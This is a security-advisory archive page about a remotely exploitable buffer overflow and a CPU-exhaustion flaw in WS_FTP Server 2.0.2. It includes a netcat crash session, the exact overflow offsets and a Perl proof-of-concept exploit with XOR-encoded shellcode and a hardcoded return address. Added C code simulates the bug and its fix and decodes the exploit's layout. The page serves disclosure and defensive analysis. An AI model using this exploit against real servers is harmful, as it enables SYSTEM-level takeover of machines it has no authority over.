SecurityTracker.com
SecurityTracker Archives

Category:   Application (File Transfer/Sharing)  >   WS_FTP
Vendor:   Ipswitch
Ipswitch's WS_FTP Server Will Execute Remotely-Supplied Arbitrary Code, Typically With System Privileges
SecurityTracker Alert ID:  1002090
SecurityTracker URL:  http://securitytracker.com/id/1002090
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 27 2001
Impact:   Denial of service via network, Execution of arbitrary code via network, Root access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 2.0.2; possibly earlier versions
Description:   Defcom Labs reported a vulnerability in the WS_FTP server that allows remote users to execute arbitrary code on the server, typically with System privileges. It may also allow remote users to crash the service.

The buffer overflow can reportedly be triggered by a valid remote user (including anonymous users) using the following commands: DELE, MDTM, MLST, MKD, RMD, RNFR, RNTO, SIZE, STAT, XMKD, and XRMD.

A remote user with a valid FTP account (including anonymous) can send one of these commands with an argument of 478 bytes (474 bytes of filler plus a 4-byte new return address), causing a buffer overflow that overwrites the saved return address (EIP).

It is also reported that a remote user with a valid FTP account (including anonymous access) can send several NULL(0x0) characters to cause the WS_FTP Server to consume 100% of CPU resources.

A demonstration exploit script is included in the Source Message.

Impact:   A remote user with FTP account access (including anonymous access) can execute arbitrary code on the server, typically with System level privileges, giving the remote user System level access to the operating system. The remote user may also be able to cause the service to consume all available CPU resources.
Solution:   The vendor has released a patch. See the Vendor URL to obtain the patch.
Vendor URL:  www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html
Cause:   Boundary error

Message History:   None.


 Source Message Contents

Subject:  def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS


======================================================================
                  Defcom Labs Advisory def-2001-28

         WS_FTP server 2.0.2 Buffer Overflow and possible DOS

Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-07-26
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
Because the server runs as a service by default, this buffer overflow
gives an attacker the ability to run code on the target with SYSTEM
rights. Note: this applies only when logged in as an anonymous user,
not as an ordinary one.

The server also contains an easy-to-trigger DoS.

------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.2 (other versions were not tested)

----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
  All the commands listed above appear to share the same parsing code,
  which suffers from a buffer overflow. Sending a command with an
  argument of 478 bytes (474 bytes of filler plus a 4-byte new return
  address) overflows a buffer and overwrites the saved return address
  (EIP). A proof-of-concept exploit is attached to the advisory; it
  works against WS_FTP server 2.0.2 running on WIN2K (Professional and
  Server, any SP).

  C:\tools\web>nc -nvv 127.0.0.1 21
  (UNKNOWN) [127.0.0.1] 21 (?) open
  220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  220-Tue Jun 19 14:00:21 2001
  220-30 days remaining on evaluation.
  220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0
  eip=41414141 esp=0104df88 ebp=41414141 iopl=0         nv up ei pl zr na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246

* Possible DOS
  Sending a few NULL (0x00) characters makes the WS_FTP Server spike
  at 100% CPU.
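
To make the boundary error concrete, the C below is an added simulation written for this page (not WS_FTP's code and not part of the Defcom advisory) of a command handler whose shared argument copy has no length check, next to the hardened copy that rejects an over-long argument before anything is written. The 474-byte argument buffer with the saved return address directly above it and the list of eleven affected verbs come from the advisory; the frame layout, the reply codes and the RET_MARK placeholder are assumptions of the simulation, and a slack area after the return slot keeps the unchecked copy inside the host process. Feeding it DELE with 478 'A's reproduces the eip=41414141 seen in the debugger output; the hardened copy leaves the saved return address untouched and answers 501.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* From the advisory: 474 bytes of argument sit below the saved return
 * address, so a 478-byte argument covers all four bytes of it. The frame
 * below is a constructed simulation of that layout, not WS_FTP's code. */
#define ARG_BUF   474
#define FRAME_LEN (ARG_BUF + 4 + 128)   /* slack keeps the simulation in bounds */
#define RET_MARK  0x0804c0deu           /* stand-in for the real saved EIP */

struct frame { unsigned char mem[FRAME_LEN]; };   /* saved EIP lives at +474 */

/* The eleven commands the advisory says share the parsing code. */
static const char *const AFFECTED[] = { "DELE", "MDTM", "MLST", "MKD", "RMD",
    "RNFR", "RNTO", "SIZE", "STAT", "XMKD", "XRMD", NULL };

int is_affected_verb(const char *verb)
{
    char up[8];
    size_t i;
    for (i = 0; verb[i] && i < 7; i++) up[i] = (char)toupper((unsigned char)verb[i]);
    up[i] = '\0';
    for (i = 0; AFFECTED[i]; i++)
        if (strcmp(up, AFFECTED[i]) == 0) return 1;
    return 0;
}

/* The boundary error: the argument is copied at whatever length arrived.
 * The FRAME_LEN guard only protects this host process; it is not the bug. */
static int copy_arg_vulnerable(struct frame *f, const char *arg, size_t n)
{
    if (n >= sizeof f->mem) return -1;
    memcpy(f->mem, arg, n); f->mem[n] = '\0';
    return 0;
}

/* The fix: reject before anything is written (room for the NUL included). */
static int copy_arg_hardened(struct frame *f, const char *arg, size_t n)
{
    if (n >= ARG_BUF) return -1;
    memcpy(f->mem, arg, n); f->mem[n] = '\0';
    return 0;
}

/* Parse "VERB argument\r\n" and dispatch. Illustrative reply codes: 500
 * malformed line, 502 verb not in the list, 501 argument rejected by the
 * hardened copy, 250 accepted. */
int handle_line(struct frame *f, const char *line, int hardened)
{
    char verb[8];
    size_t i = strcspn(line, " \r\n");
    if (i == 0 || i >= sizeof verb) return 500;
    memcpy(verb, line, i); verb[i] = '\0';
    if (!is_affected_verb(verb)) return 502;
    const char *arg = line[i] == ' ' ? line + i + 1 : line + i;
    size_t n = strcspn(arg, "\r\n");
    int rc = hardened ? copy_arg_hardened(f, arg, n) : copy_arg_vulnerable(f, arg, n);
    return rc == 0 ? 250 : 501;
}

/* Build "<verb> <n x fill>\r\n", run it through a fresh frame whose saved
 * return address is RET_MARK, and report the reply and what the slot
 * holds afterwards. */
int run_request(const char *verb, size_t n, char fill, int hardened, uint32_t *saved_ret)
{
    static char line[1024];
    struct frame f;
    uint32_t mark = RET_MARK;
    size_t v = strlen(verb);
    if (v + 1 + n + 3 > sizeof line) return -1;
    memcpy(line, verb, v); line[v] = ' ';
    memset(line + v + 1, fill, n);
    memcpy(line + v + 1 + n, "\r\n", 3);
    memset(f.mem, 0, sizeof f.mem);
    memcpy(f.mem + ARG_BUF, &mark, sizeof mark);
    int reply = handle_line(&f, line, hardened);
    memcpy(saved_ret, f.mem + ARG_BUF, sizeof *saved_ret);
    return reply;
}

int reply_for(const char *verb, size_t n, char fill, int hardened)
{ uint32_t r; return run_request(verb, n, fill, hardened, &r); }

uint32_t saved_ret_for(const char *verb, size_t n, char fill, int hardened)
{ uint32_t r = 0; run_request(verb, n, fill, hardened, &r); return r; }

int main(void)
{
    printf("DELE + 478 x 'A', unchecked copy: reply %d, saved EIP now 0x%08x\n",
           reply_for("DELE", 478, 'A', 0), (unsigned)saved_ret_for("DELE", 478, 'A', 0));
    printf("DELE + 478 x 'A', hardened copy:  reply %d, saved EIP still 0x%08x\n",
           reply_for("DELE", 478, 'A', 1), (unsigned)saved_ret_for("DELE", 478, 'A', 1));
    return 0;
}
```

The only difference between the two copies is one comparison before the write. A 473-byte argument passes the hardened check, a 474-byte one is refused, and the unchecked copy accepts the same 478-byte line and replaces the saved return address with the filler byte, which is what the register dump above shows.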

---------------------------=[Workaround]=-----------------------------

Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp.pl

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendor's attention on the 18th of
June, 2001. A patch has been released.

======================================================================
            This release was brought to you by Defcom Labs

              labs@defcom.com             www.defcom.com
======================================================================
Attachment: ws_ftp.pl

#!/usr/local/bin/perl
#########################################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
#########################################################################
use strict;
use warnings;
use Socket;

my $login = "ftp";	# username (anonymous account)
my $pass  = "ftp";	# password
#########################################################################
if (@ARGV != 1) {
	print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
	print "It creates a file named defcom.iyd in the c-root\n";
	print "(C)2001 andreas\@defcom.com\n";
	print "Usage: $0 <host>\n";
	print "Example: $0 127.0.0.1\n";
	exit;
}

my $remote = $ARGV[0];
my $port   = 21;

my $iaddr = inet_aton($remote)         or die "Error: $!";
my $paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
my $proto = getprotobyname('tcp')      or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr)                      or die "Error: $!";

# Log in as the anonymous user. Replies are never read; the script just
# waits a second between commands for the server to catch up.
sleep(1);
my $msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";

# Payload: a 24-byte decoder stub (mov cx,0x8142 / xor cx,0x8080 gives a
# count of 450; xor byte [eax],0x95 / inc eax / loop) followed by the
# XOR-0x95 encoded shellcode.
my $sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit .= "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit .= "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit .= "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";

# Layout of the DELE argument (offsets from its first byte):
#   0..459   decoder + encoded shellcode, padded to 460 with \xd4
#   460..473 14 encoded bytes: the path of the file the payload creates
#   474..477 new return address (0x7754a3ab, little-endian) that replaces
#            the saved EIP: the advisory's "474 bytes + new return address"
#   478..493 16 bytes of \xd4 filler
#   494..    mov eax,esp / sub eax,0x7f x3 / sub eax,0x71 / jmp eax:
#            jumps back down into the buffer where the decoder sits
$msg = "dele " . $sploit . "\xd4" x (460 - length($sploit))
     . "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg .= "\xab\xa3\x54\x77" . "\xd4" x 16
     . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;	# echo the raw request to stdout
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
close(SOCK);
exit;
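
Reading the attached PoC back against the advisory: the stub at the start of $sploit loads cx with 0x8142 xor 0x8080 = 450 and XOR-decodes that many bytes with 0x95 starting 24 bytes past its own beginning, which is exactly the 474 bytes that precede the new return address, and the 14 bytes placed at offset 460 decode to the path the script says it creates. The C below is an added check of that layout, written for this page and not part of the advisory or of ws_ftp.pl; the byte arrays are copied from the script, and the small pattern scans recover the key, the loop count and the trampoline's displacement from the opcodes rather than from hand-written constants. What the target has at 0x7754a3ab is not stated in the advisory and is not checked here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Byte sequences copied from the attached ws_ftp.pl. */
static const unsigned char DECODER[] = {   /* first 24 bytes of $sploit */
    0x8b,0xd8, 0x8b,0xf8, 0x83,0xc0,0x18, 0x33,0xc9, 0x66,0xb9,0x42,0x81,
    0x66,0x81,0xf1,0x80,0x80, 0x80,0x30,0x95, 0x40, 0xe2,0xfa };
static const unsigned char ENC_PATH[14] = { /* placed at offset 460 */
    0xf6,0xaf,0xc9,0xf1,0xf0,0xf3,0xf6,0xfa,0xf8,0xbb,0xfc,0xec,0xf1,0x95 };
static const unsigned char RET_BYTES[4] = { 0xab,0xa3,0x54,0x77 };
static const unsigned char TRAMPOLINE[] = { /* after 16 bytes of 0xd4 */
    0x8b,0xc4, 0x83,0xe8,0x7f, 0x83,0xe8,0x7f, 0x83,0xe8,0x7f, 0x83,0xe8,0x71, 0xff,0xe0 };

#define PAD_TO   460   /* "\xd4" x (460 - length($sploit)) */
#define PAD_BYTE 0xd4

/* Pull the key out of the stub's "xor byte [eax], imm8" (80 30 ib). */
int decoder_xor_key(void)
{
    for (size_t i = 0; i + 2 < sizeof DECODER; i++)
        if (DECODER[i] == 0x80 && DECODER[i+1] == 0x30) return DECODER[i+2];
    return -1;
}

/* Loop count: "mov cx, imm16" (66 b9 iw) then "xor cx, imm16" (66 81 f1 iw).
 * The xor is how the stub builds a count without NUL bytes. */
unsigned decoder_loop_count(void)
{
    unsigned cx = 0;
    for (size_t i = 0; i + 3 < sizeof DECODER; i++) {
        if (DECODER[i] == 0x66 && DECODER[i+1] == 0xb9)
            cx = DECODER[i+2] | (DECODER[i+3] << 8);
        if (i + 4 < sizeof DECODER && DECODER[i] == 0x66 &&
            DECODER[i+1] == 0x81 && DECODER[i+2] == 0xf1)
            cx ^= DECODER[i+3] | (DECODER[i+4] << 8);
    }
    return cx;
}

/* Decode n bytes with key into out (n+1 bytes); returns the C-string length. */
size_t xor_decode(const unsigned char *in, size_t n, unsigned char key, char *out)
{
    for (size_t i = 0; i < n; i++) out[i] = (char)(in[i] ^ key);
    out[n] = '\0';
    return strlen(out);
}

/* The path the payload creates, recovered from ENC_PATH. */
const char *decoded_path(void)
{
    static char buf[sizeof ENC_PATH + 1];
    xor_decode(ENC_PATH, sizeof ENC_PATH, (unsigned char)decoder_xor_key(), buf);
    return buf;
}

/* What the 0xd4 filler becomes once decoded (it lies inside the decoded range). */
int decoded_pad_byte(void) { return PAD_BYTE ^ decoder_xor_key(); }

/* Offset of the return-address overwrite inside the DELE argument. */
size_t ret_offset(void) { return PAD_TO + sizeof ENC_PATH; }

/* The overwrite value, read little-endian as the CPU does. */
uint32_t ret_value(void)
{
    return (uint32_t)RET_BYTES[0] | (uint32_t)RET_BYTES[1] << 8 |
           (uint32_t)RET_BYTES[2] << 16 | (uint32_t)RET_BYTES[3] << 24;
}

/* Distance the trampoline moves back from ESP before "jmp eax": the sum of
 * every "sub eax, imm8" (83 e8 ib) in the stub. */
unsigned trampoline_backjump(void)
{
    unsigned total = 0;
    for (size_t i = 0; i + 2 < sizeof TRAMPOLINE; i++)
        if (TRAMPOLINE[i] == 0x83 && TRAMPOLINE[i+1] == 0xe8) { total += TRAMPOLINE[i+2]; i += 2; }
    return total;
}

int main(void)
{
    printf("decoder: key 0x%02x, %u bytes decoded after its %zu-byte stub, ends at %zu\n",
           decoder_xor_key(), decoder_loop_count(), sizeof DECODER,
           sizeof DECODER + decoder_loop_count());
    printf("saved EIP overwritten at offset %zu with 0x%08x\n", ret_offset(), (unsigned)ret_value());
    printf("filler 0xd4 decodes to 0x%02x; encoded path decodes to \"%s\"\n",
           decoded_pad_byte(), decoded_path());
    printf("trampoline: jmp to esp - %u\n", trampoline_backjump());
    return 0;
}
```

Two things fall out that the script's comments do not say: the 0xd4 filler decodes to 0x41 (inc ecx), so the decoded run from the end of the shellcode to the path is harmless if executed, and the decoded region ends exactly at the return-address slot, so a defender testing a patched build with this PoC should expect the 474-byte boundary to be the one the fix has to hold.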

 
 


Copyright 2019, SecurityGlobal.net LLC